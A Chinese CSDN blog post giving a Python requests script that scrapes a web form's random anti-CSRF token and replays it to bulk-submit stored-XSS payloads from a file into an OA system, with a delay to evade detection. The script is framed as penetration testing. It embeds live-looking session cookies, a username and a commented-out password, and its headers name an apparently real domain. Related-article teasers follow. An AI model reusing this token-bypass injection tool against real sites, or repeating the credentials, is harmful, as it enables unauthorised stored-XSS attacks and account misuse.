Python安全之绕过随机Token——使用requests批量提交XSS Payload

最新推荐文章于 2024-06-09 17:42:29 发布
最新推荐文章于 2024-06-09 17:42:29 发布
阅读量896 收藏 3
点赞数
分类专栏: WEB安全 文章标签: python post session
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43853965/article/details/103975691
版权

背景:
这是我的上一篇Python安全之绕过随机Token——使用Brup找出随机Token下篇,上篇中通过burp成功找到了随机Token的返回位置。这篇就使用python自动获取token并自动填到POST数据中进行重放,从而最终达到绕过随机Token的验证实现自动批量提交测试payload。

分析:
根据上一篇得到的结果,我要实现自动批量提交测试payload实际上只需要两步:
1、在Response页面中抓取token值,Response页面如下图:
随机token
2、构造post请求,同时将抓取到的token传到post请求中。
请求数据
可以看出这里post的数据并不是我们常见的以&为分隔符的数据,这也是本例的一个难点,如何用python构造这种数据结构,不过也就仅仅一两行代码,这就是python强大之处,有各种强大的库。话不多说,上代码:

代码:
由于没有通用性,这次并没有使用命令行传参,仅供实际工作中遇到时参考。

#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# @Time     :2020/1/9 16:13
# @Author   :Donvin.li
# @File     :bypasstoken.py

import requests
import re
from requests_toolbelt.multipart.encoder import MultipartEncoder
import time

# GetCookie函数是用来自动填写验证表单,获取cookie用的。这里并没有实际启用
# def GetCookie():
#     s=requests.session()
#     loinurl='http://xxxx.cn/logincheck.php'
#     postdata=dict(UNAME='test_st',PASSWORD='ZHQ5X2xzYzR3')
#     rs=s.post(loinurl,postdata)
#     cookies=rs.cookies['PHPSESSID']
#     GetToken(cookies)

# proxies是我的Burp代理,为了分析数据之用
proxies = {'http': 'http://127.0.0.1:8080',
           'https': 'http://127.0.0.1:8080'}
# cookies作为全局变量同时给两个函数使用
cookies = {'acw_tc': '24f9501e15784861328236498e24803eed8a7875968d919fd4299a7d1b',
               'USER_NAME_COOKIE': 'test_st',
               'SID_24047': '30a9bc1f',
               'PHPSESSID': 'bk03tldf1o1of2u0ijm6d0udc3',
               'OA_USER_ID': '24047'}

#每遍历一个payload同时请求一个随机token,把payload和token成对提交给PostPayload函数
def GetToken():
    s=requests.session()
    url='http://xxxx.cn/general/needs_optimization/create_needs/add.php'
    headers ={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0'}
    file = open('payload.txt', 'r')
    for i in file:
        payload=i
        rs=s.get(url,headers=headers,cookies=cookies)
        response=rs.text
        re1=re.search('.*<input type="hidden".*',response)	#用正则获取Token所在的行
        str=re1.group()
        token=str.split('"')[5]	#用字符截取获取Token的值
        # print(token)
        time.sleep(5)   #非必须,为了防止服务器或防火墙有检测机制,每次提交5秒后提交下一次
        PostPayload(token, payload)

#只做执行post数据的操作
def PostPayload(token,payload):
    s = requests.session()
    url='http://xxxx.cn/general/needs_optimization/create_needs/submit.php'
    headers={'Host': 'xxxx.cn',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
            'Accept-Encoding': 'gzip, deflate',
            'Origin': 'http://portal.crlandpm.com.cn',
            'Connection': 'close',
            'Referer': 'http://xxxx.cn/general/needs_optimization/create_needs/add.php',
            'Upgrade-Insecure-Requests': '1'
            }
    postdata = {'n_s_token': token,
                'NEED_TITLE': 'test',
                'CATE_ID': '2',
                'MODULE_ID': '12',
                'TYPE_ID': '6',
                'TD_HTML_EDITOR_NEED_DESC': 'test1',
                'TD_HTML_EDITOR_ACTUALITY': 'test2',
                'TD_HTML_EDITOR_SUGGESTION': payload,
                'NEED_NOTICE': 'test4',
                'attach_list': ('', '', 'application/octet-stream')
                }
    data=MultipartEncoder(postdata) #这一步非常关键,用于post Content-Type:multipart/form-data的数据格式。
    headers['Content-Type'] = data.content_type
    rs = s.post(url, data=data, headers=headers, cookies=cookies,proxies=proxies)
    # print(rs.request.body)
    # print(rs.text)

if __name__=="__main__":
    GetToken()

关于post Content-Type:multipart/form-data的数据格式的构造请参考Python 实现multipart/form-data 图片上传

沙漠网管
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
浅谈Cookie、SessionToken
tree_stretch的博客
06-22 341
深度剖析Cookie机制、Session机制、Token机制。文章比较详细,坚持看完一定会有收获,从此再也不惧怕这三大机制。
失败了n次以后,我总结了5种Python爬虫伪装技巧!
白帽阿叁的博客
10-13 2501
大家好,我是程序员晓晓,今天给大家聊一聊爬虫。爬虫伪装的最高境界就是用代码模拟人的真实操作,因为网站设计出来就是为了让别人访问的,掌握爬虫的伪装技巧,能够让大大提高我们爬虫的成功率。结合自身的经验,给大家介绍5种爬虫伪装的技巧,并把代码模板奉上,希望能够对你有所帮助。
Python爬虫入门与登录验证自动化思路
最新发布
littleschemer的博客
06-09 2631
Python爬虫是使用Python编写的程序,可以自动访问网页并提取其中的信息。爬虫可以模拟浏览器的行为,自动点击链接、填写表单、进行登录等操作,从而获取网页中的数据。本文使用selenium工具,结合第三方打码平台,演示如何全自动登录需要验证码操作的网站平台。
python post请求伪造登陆 浏览器抓包
weixin_34185512的博客
12-08 736
网站是vmware虚拟机搭建了个go网络商城,Tomcat+Mysql+SSH架构的,这是后台界面,浏览器按F12抓包账号密码admin 下面我们py伪造post请求登陆#coding=utf-8 importurllib importurllib2 importre #9ok模拟登陆了admin账户 defDengLu(username='admin',pass...
python post请求头部伪装随机(防止封ip)
qq_37760746的博客
10-26 1423
import random def get_headers(): ''' 随机获取一个headers ''' user_agents = ['Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1
post入门篇:请求头/响应头、cookie、URL结构/编码、数据编码、winHttpRequest、post分析技巧、伪装IP
热门推荐
旧人小表弟的博客 - 无业游民学习笔记
09-03 1万+
协议头 协议头好像没啥好说的 直接上小肩膀post+js第三期视频里讲的例子,当年我学习的时候截的图 请求头 响应头 cookie cookie的话,大多数编程语言都可以自动处理,手动获取,再合并更新太麻烦 比如Pythonrequests库,设置保持cookie后,之后的操作跟浏览器一样,都会自动合并更新cookie的 易语言的话,一般大多数的网页_访问_对象()命令,只要在提交cookie那里给一个变量,每次请求完成后,这个变量的值都是合并更新后的cookie,【所有的请求都在提交cook
Python 如何实现Bearer模式的Token验证 Python源码
11-13
Python 如何实现Bearer模式的Token验证 Python源码Python 如何实现Bearer模式的Token验证 Python源码Python 如何实现Bearer模式的Token验证 Python源码Python 如何实现Bearer模式的Token验证 Python源码Python 如何...
python之——使用python编写爆破脚本
12-21
#coding:utf-8 """ dvwa高级爆破 ...""" import urllib2 ... """提取token""" url="http://localhost/DVWA-master/vulnerabilities/brute/" req=urllib2.Request(url,headers={"Cookie":"security=high;PHP
JC-AntiToken:burp插件:python版,token防重放绕过
05-27
burp插件:python版,token防重放绕过 Author: JC0o0l,Jerrybird Team: Z1-Sec WeChat: JC_SecNotes(Zer0ne安全研究) 0x01 目标: token防重放绕过 界面效果如下: 0x02 适用场景: 请求包带有防重放的tokentoken...
python requests接口自动化把登录token保存在文件,实现所有用例登录一次(csdn)————程序.pd.pdf
12-03
本文将探讨如何使用Pythonrequests库和yaml模块来实现接口自动化测试中的登录逻辑,使得所有用例只需登录一次,之后的请求通过读取保存的token来避免重复登录。 首先,我们需要理解`token`的概念。在Web应用中,`...
python的unittest架构公共参数token提取方法详解
09-19
Python的测试框架unittest中,有时我们需要处理一些公共参数,比如在API测试中常见的tokentoken通常用于验证请求的合法性,且经常变化,这给维护测试用例带来了不便。本篇文章将详细讲解如何在unittest中提取并...
绕过token脚本
08-14
该脚本是用来绕过user_token的,是用PHP写的,可以用在爆破也可以用在其他方面
Python安全绕过随机Token——使用Brup找出随机Token
weixin_43853965的博客
01-14 642
这是某OA的一个页面,主要功能是供用户提交一些需求,页面有表单和文件上传接口,在对该页面进行安全测试的时候,我希望对这些用户输入表单进行存储型XSS的测试,然而由于页面使用随机Token,致使用扫描器进行扫描时发现并不能批量写入。于是用Burp进行手工测试。
Python爬虫登录后token处理
永远是少年
01-07 5220
今天继续给大家介绍Python爬虫相关知识,本文主要内容是Python爬虫登录后token处理。 一、网页tokentoken作用 二、Python爬虫token问题解决
关于通过requests.session()来完成登录操作的踩坑
weixin_47175709的博客
03-20 291
接口自动化
python经典算法小程序-Python爬虫系列之微信小程序逆向某优选爬虫签名算法!厉害...
weixin_37988176的博客
10-29 307
代码仅供学习交流,请勿用于非法用途直接上代码import hashlibfrom parser import parseParamfrom sign import sign# 接口秘钥,代码仅供学习,不提供暴露签名secret = ""def md5(s):m = hashlib.md5()m.update(s.encode("utf-8"))return ...
微信小程序python token验证_微信小程序爬虫遇到 token 的问题
weixin_39765588的博客
11-28 1675
最近在写一个小程序爬虫,但 token 一小时就过期了,希望实现自动获取 token 功能。抓包发现获取 tokenpost 中有下面这些参数:{"code": "061DUBm620Tz8S0Oq5q62GdFm62DUBmh","appid": "wxf8e9886ac9480eba","sign": "c2b542186ec81e639fb638599949cc76","nonceSt...
如何在本地跳过小程序token验证测试接口
dj1540225203的博客
05-15 1378
不需要验证token,这样做方便测试。
要求使用pythonrequests库实现若依的接口调用,带上token
04-12
好的,这个问题属于技术问题。以下是使用 Python requests 库实现若依接口调用的示例代码,并带上 Token: ```python import requests url = "https://ruoyi.com/api/system/user/getUserInfo" headers = { "Authorization": "Bearer your_token_here" } response = requests.get(url, headers=headers) if response.status_code == 200: print(response.json()) else: print("接口调用失败") ``` 请将 "your_token_here" 替换为您的 Token 值,然后执行该代码即可实现若依接口的调用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值